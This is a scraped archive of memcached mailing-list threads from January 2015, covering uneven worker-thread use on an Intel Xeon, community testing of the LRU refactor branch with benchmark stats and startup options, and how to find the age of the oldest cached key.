Re: Memcached odd behaviour on intel xeon E5-4610
I am running some tests using memcached 1.4.22 on an Intel Xeon E5 (4 sockets with 8 cores each, 2 hyper-threads per core, and 4 NUMA nodes) running Ubuntu trusty. I compiled memcached with gcc 4.8.2 using the default CFLAGS and configure options. The problem: whenever I start memcached with an odd number of server threads (3, 5, 7, 9, 11, ...) everything is fine, all threads engage in processing requests, and the status of every thread is Running. However, if I start the server with an even number of threads (2, 4, 6, 8, ...), half of the threads stay asleep and never service clients. This seems specific to memcached; memaslap, for example, shows no such pattern. I ran the exact same test on an AMD Opteron and memcached behaves fine there. So my question is: is there any specific tuning required for Intel machines? Is there any specific flag or some part of the code that might keep worker threads from engaging? Thanks, Saman That is pretty weird. I've not run it on a quad socket, but I have on plenty of Intel machines without problems, modern ones too. How many clients are you telling memaslap to use? Can you try https://github.com/dormando/mc-crusher quickly? (Run loadconf or similar to load some values, then a different config to hammer it.) Connections are dispersed via thread.c:dispatch_conn_new():
int tid = (last_thread + 1) % settings.num_threads;
LIBEVENT_THREAD *thread = threads + tid;
last_thread = tid;
which is pretty simple at its base. If you can attach gdb, can you dump the per-thread stats structures? That will show definitively whether those threads ever get work or not.
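To make the distribution property concrete, here is a small standalone sketch (not memcached source; it just replays the arithmetic from the dispatch_conn_new() snippet above) that can be compiled and run with any thread count:

#include <stdio.h>

/* Standalone sketch: replays the round-robin from dispatch_conn_new() above.
 * Every worker gets connections in turn, whether num_threads is odd or even,
 * so uneven thread usage would have to come from somewhere else. */
int main(void) {
    int num_threads = 4;                 /* try both odd and even values */
    int counts[64] = {0};
    int last_thread = -1;

    for (int conn = 0; conn < 1000; conn++) {
        int tid = (last_thread + 1) % num_threads;
        last_thread = tid;
        counts[tid]++;                   /* stand-in for handing the fd to worker tid */
    }
    for (int t = 0; t < num_threads; t++)
        printf("thread %d got %d connections\n", t, counts[t]);
    return 0;
}

The dispatcher itself hands out connections evenly, which is why the per-thread stats dump is the interesting next step: it separates "never dispatched to" from "dispatched to but never woken".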
Re: memory efficiency / LRU refactor branch
Can probably get rid of that since I added the juggles stat, and/or rename it to maintainer_runs or something... it was useful for seeing whether I'd hung the thread. On Tue, 20 Jan 2015, Eric McConville wrote: This is more of a comment, but I noticed when debugging with the lru_maintainer option under extreme verbosity (-vvv), I get an endless running/sleeping message.
~ ./memcached -vvv -o lru_maintainer
// ... slab start-up ...
LRU maintainer thread running
LRU maintainer thread sleeping
LRU maintainer thread running
LRU maintainer thread sleeping
LRU maintainer thread running
LRU maintainer thread sleeping
// ... endless...
Expected, but a bit annoying. On Tue, Jan 20, 2015 at 12:37 AM, dormando dorma...@rydia.net wrote: Thanks! No crashes is interesting/useful at least? No errors or other problems? I'm still hoping someone can run a side-by-side in production with the recommended settings. I can come up with synthetic tests all day and it doesn't educate in the same way. On Tue, 20 Jan 2015, Zhiwei Chan wrote: Test result: I ran this test last night, and the results are as follows:
1. Environment:
[root@jason3 code]# lsb_release -a
LSB Version: :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.5 (Final)
Release: 6.5
Codename: Final
[root@jason3 code]# free
total used free shared buffers cached
Mem: 8003888 3434536 4569352 0 263324 1372600
-/+ buffers/cache: 1798612 6205276
Swap: 8142840 11596 8131244
[root@jason3 code]# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 58
model name : Intel(R) Xeon(R) CPU E3-1225 V2 @ 3.20GHz
stepping : 9
cpu MHz : 1600.000
cache size : 8192 KB
4 cores.
2. Running options:
[root@jason3 code]# ps -ef|grep memcached-
root 7898 1 11 Jan19 ? 02:12:46 ./memcached-master -c 10240 -o tail_repair_time=7200 -m 64 -u root -p 3 -d
root 8092 1 11 Jan19 ? 02:11:22 ./memcached-lrurework -d -c 10240 -o lru_maintainer lru_crawler -m 64 -u root -p 4
root 10265 9447 0 11:30 pts/1 00:00:00 grep memcached-
root 10325 1 11 Jan19 ? 02:06:14 ./memcached-release -d -c 10240 -m 64 -u root -p 5 -o slab_reassign lru_crawler slab_automove=3 release_mem_sleep=1 release_mem_start=40 release_mem_stop=80 lru_crawler_interval=3600
memcached-master: the latest memcached from the master branch, on port 3.
memcached-lrurework: the latest lru_rework branch of dormando's memcached, on port 4.
memcached-release: the latest master branch plus the release-memory patch, on port 5.
3. What is the traffic mode? It simulates the traffic distribution of one of our pools, with the expire-time and value-length distributions as follows:
#the expire of keys
expire_time = [1,5,10,30,60,300,600,3600,86400,0]
expire_time_weight = [1,1, 2, 5, 8, 5, 6, 5, 3,1]
#the len of value
value_len = [4,10,50,100,200,500,1000,2000,5000,1]
value_len_weight = [3, 4, 5, 8, 8, 10, 5, 5, 2, 1]
Using the Python script compare_test.py to execute:
python ./compare_test.py 192.168.116.213:3,192.168.116.213:4,192.168.116.213:5
I run the test process on the same machine that runs the memcached processes, so it is easy to generate a heavy workload. I have the results from the last 12 hours, watched in Cacti; it seems there is no difference for this traffic mode.
gets/sets = 9:1, hit_rate ~ 50% [IMAGE]
I also print some detailed statistics in the test script:
Cache list: ['192.168.116.213:3', '192.168.116.213:4', '192.168.116.213:5']
send_key_number: 127306 --- number of unique keys
test_loop: 0 --- loop forever, no limit
weight of get/set command: [10, 1] --- the weight of get vs. set commands. Note: if a get misses, the key is set immediately, and that set is not counted in this weight.
show_interval: 10 --- the interval (seconds) between printing statistics
stats_interval: 5 --- the interval between fetching memcached stats
show_stats_interval: [60, 3600, 43200] --- the time ranges shown, in seconds; e.g. 60 means the last 60s, 3600 the last hour
len of keys: [4, 10, 50, 100, 200, 500, 1000, 2000, 5000, 1] possible
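For reference, a rough standalone sketch of the kind of weighted pick described above (the value and weight tables are copied from the message; weighted_pick() is an illustrative helper name, not something taken from compare_test.py):

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* Pick a value with probability proportional to its weight. */
static const int expire_time[]        = {1, 5, 10, 30, 60, 300, 600, 3600, 86400, 0};
static const int expire_time_weight[] = {1, 1,  2,  5,  8,   5,   6,    5,     3, 1};

static int weighted_pick(const int *vals, const int *weights, int n) {
    int total = 0;
    for (int i = 0; i < n; i++)
        total += weights[i];
    int r = rand() % total;            /* 0 .. total-1 */
    for (int i = 0; i < n; i++) {
        if (r < weights[i])
            return vals[i];
        r -= weights[i];
    }
    return vals[n - 1];                /* not reached */
}

int main(void) {
    srand((unsigned)time(NULL));
    for (int i = 0; i < 10; i++)
        printf("expire_time=%d\n",
               weighted_pick(expire_time, expire_time_weight, 10));
    return 0;
}

The same helper works unchanged for the value_len/value_len_weight tables.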
Re: memory efficiency / LRU refactor branch
: 12405356058, OOMs: 0, evict: 359460
192.168.116.213:5 [60s] gets: 523093, hit: 49%, updates: 52116, dels: 0, items: 28/69396, read: 52993446, write: 215231210, OOMs: 0, evict: 6491
[3600s] gets: 29669464, hit: 49%, updates: 2961988, dels: 0, items: -25/69396, read: 3038356827, write: 12219764097, OOMs: 0, evict: 355644
...
On Fri, Jan 16, 2015 at 9:29 PM, Zhiwei Chan z.w.chan.ja...@gmail.com wrote: Our maintenance team tends to be conservative, especially about basic software that affects performance, so I think it is unlikely we can put this into production soon. But I have written a pretty convenient tool in Python for an A/B test. The tool can fake traffic with random expire times and random value lengths, lets you specify weights for the different expire times and lengths, and has lots of other functions. It is almost complete, and I can post a result next Monday. On Fri, Jan 16, 2015 at 11:12 AM, dormando dorma...@rydia.net wrote: If you want? What would make you confident enough to try the branch in production? Or do you rely on your other patches and that's not really possible? On Thu, 15 Jan 2015, Zhiwei Chan wrote: I tried to use real application traffic for a comparison test, but it seems that not everyone uses a cache client with consistent hashing in the dev environment, so the traffic is not distributed as well as I expected. Should I fake the traffic for the comparison test instead of using real traffic? E.g., generate keys with random expire times to set and get against memcached. --- host mc56 runs the latest LRU-rework branch's memcached with options like /usr/local/bin/memcached -u nobody -d -c 10240 -o lru_maintainer lru_crawler -m 64 -p 11811; host mc57 runs version 1.4.20_7_gb118a6c with options like /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200 -m 64 -p 11811. I sum up the stats of all memcached instances on each host and make the following analysis: Inline image 1 On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote: Last update to the branch was 3 days ago. I'm not planning on doing any more work on it at the moment, so people have a chance to test it. thanks! On Tue, 13 Jan 2015, Zhiwei Chan wrote: I compiled directly from your branch on the test server; please tell me if it needs updating and recompiling. On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote: That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last Friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low-traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, with no crash so far. As I have finished the haproxy work today, I will try a comparison test for this LRU work tomorrow, as follows: there are two servers (CentOS 5.8, 8 cores, 8 GB memory) in the dev environment, and both run 32 memcached instances (processes) with a maximum memory of 128M each. One server runs version 1.4.21, the other runs this branch. Lots of pools use these memcached servers, and each pool uses two memcached instances on different servers.
The pools' clients use a consistent-hash algorithm to distribute keys across their two memcached instances. I will watch the hit rate and other performance metrics using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if you have any other advice. 2015-01-08 4:21 GMT+08
Re: memory efficiency / LRU refactor branch
If you want? What would make you confident enough to try the branch in production? Or do you rely on your other patches and that's not really possible? On Thu, 15 Jan 2015, Zhiwei Chan wrote: I try to use real traffic of application to make a compare test, but it seems that not all of guys use the cache-client with consistent hash in dev environment. The result is that the traffic is not distributed well as I supposed. Should I fake the traffic and make a compare test instead of real traffic? e.g., fake the random expire-time keys traffic to set and get for memcached. --- host mc56 installs the most update LRU-rework branch's memcached with option likes /usr/local/bin/memcached -u nobody -d -c 10240 -o lru_maintainer lru_crawler -m 64 -p 11811; host mc57 install the version 1.4.20_7_gb118a6c's memcached, with option likes /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200 -m 64 -p 11811, I sum up the stats of all memcache instances on the host and make followings analysis: Inline image 1 On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote: Last update to the branch was 3 days ago. I'm not planning on doing any more work on it at the moment, so people have a chance to test it. thanks! On Tue, 13 Jan 2015, Zhiwei Chan wrote: I compile directly using your branch on the test server, and please tell me if it need update and re-compile. On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote: That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 
2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached
Re: memory efficiency / LRU refactor branch
Last update to the branch was 3 days ago. I'm not planning on doing any more work on it at the moment, so people have a chance to test it. thanks! On Tue, 13 Jan 2015, Zhiwei Chan wrote: I compile directly using your branch on the test server, and please tell me if it need update and re-compile. On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote: That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. 
I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks
Re: Is there a where to work out when the key was written to memcache and calculate the age of the oldest key on our memcache?
The only data stored are when the item expires, and when the last time it was accessed. The age field (and evicted_time) is how long ago the oldest item in the LRU was accessed. You can roughly tell how wide your LRU is with that. On Mon, 12 Jan 2015, 'Jay Grizzard' via memcached wrote: I don’t think there’s a way to figure out when a given key was written. If you really needed that, you could write it as part of the data you stored, or use the ‘flags’ field to store a unixtime timestamp. You can get the age of the oldest key, on a per-slab basis, with ‘stats items’ and looking at the ‘age’ field. If you want the overall oldest age, you’ll have to find the oldest age value amongst all the slabs. Do note, though, that if you have evictions going on, ‘oldest’ is kind of dubious, if you’re trying to use it as a “anything newer than this exists”, since evictions happen in lru order and per-slab, so younger items can disappear before older ones, if they’re in a different slab or have been accessed more recently. (Don’t know if that’s what you’re doing, but just in case you are…) -j On Mon, Jan 12, 2015 at 9:34 AM, Gurdipe Dosanjh gurd...@veeqo.com wrote: Hi All, I am new to memcache and need to know is there a where to work out when the key was written to memcache and calculate the age of the oldest key on our memcache? Kind Regards Gurdipe -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
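For anyone following along, the age field mentioned above shows up per slab class in the output of 'stats items'; with made-up numbers it looks roughly like:

stats items
STAT items:5:number 10234
STAT items:5:age 86321
STAT items:12:number 311
STAT items:12:age 1742
END

The "age of the oldest key" the question asks about would then be the maximum age across classes (86321 seconds in this made-up example), subject to the per-slab and eviction caveats Jay describes above.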
Re: memory efficiency / LRU refactor branch
That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. 
thanks, -Dormando
Re: memory efficiency / LRU refactor branch
Hi, https://github.com/memcached/memcached/pull/97 I've been poking at the TODO list since originally posting and fixed a number of bugs. I'm taking some extra time to think about the slab rebalancer situation and will be doing more testing than coding from now on. Hoping to get some of you folks involved in testing. I'll give it a good soak before merging. Please and thanks! On Wed, 7 Jan 2015, dormando wrote: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
RE: memory efficiency / LRU refactor branch
The latest commits document the new statistics counters. If there're other that might be interesting let me know. Mainly to compare before/after you only really need to look at the hit ratio. If your dataset is large enough to push items through cache, this is where the improvements start. Otherwise uh... if it actually functions that's good to know an generally obvious to monitor (non-corrupt data, doesn't crash). On Thu, 8 Jan 2015, Ryan McCullagh wrote: Hi, I'm going to be using your lru_rework branch on my development machines starting tonight. I'm looking for some ways to monitor it? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Thursday, January 8, 2015 9:25 PM To: memcached@googlegroups.com Subject: Re: memory efficiency / LRU refactor branch Hi, https://github.com/memcached/memcached/pull/97 I've been poking at the TODO list since originally posting and fixed a number of bugs. I'm taking some extra time to think about the slab rebalancer situation and will be doing more testing than coding from now on. Hoping to get some of you folks involved in testing. I'll give it a good soak before merging. Please and thanks! On Wed, 7 Jan 2015, dormando wrote: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. 
memory efficiency / LRU refactor branch
Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fare better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODOs noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTLs that expire in reasonable amounts of time. thanks, -Dormando
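(For anyone setting up graphs for this before/after comparison: the hit ratio referred to here can be derived from the standard stats counters, e.g.

hit_ratio = get_hits / (get_hits + get_misses)

sampled per interval by diffing the counters, rather than over the whole lifetime of the process.)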
Re: memory efficiency / LRU refactor branch
To be extra clear; you can send feeback here or the PR. I don't care either way. On Wed, 7 Jan 2015, dormando wrote: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: memory efficiency / LRU refactor branch
Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
1.4.22
https://code.google.com/p/memcached/wiki/ReleaseNotes1422
Re: sets failing, nothing going over the network
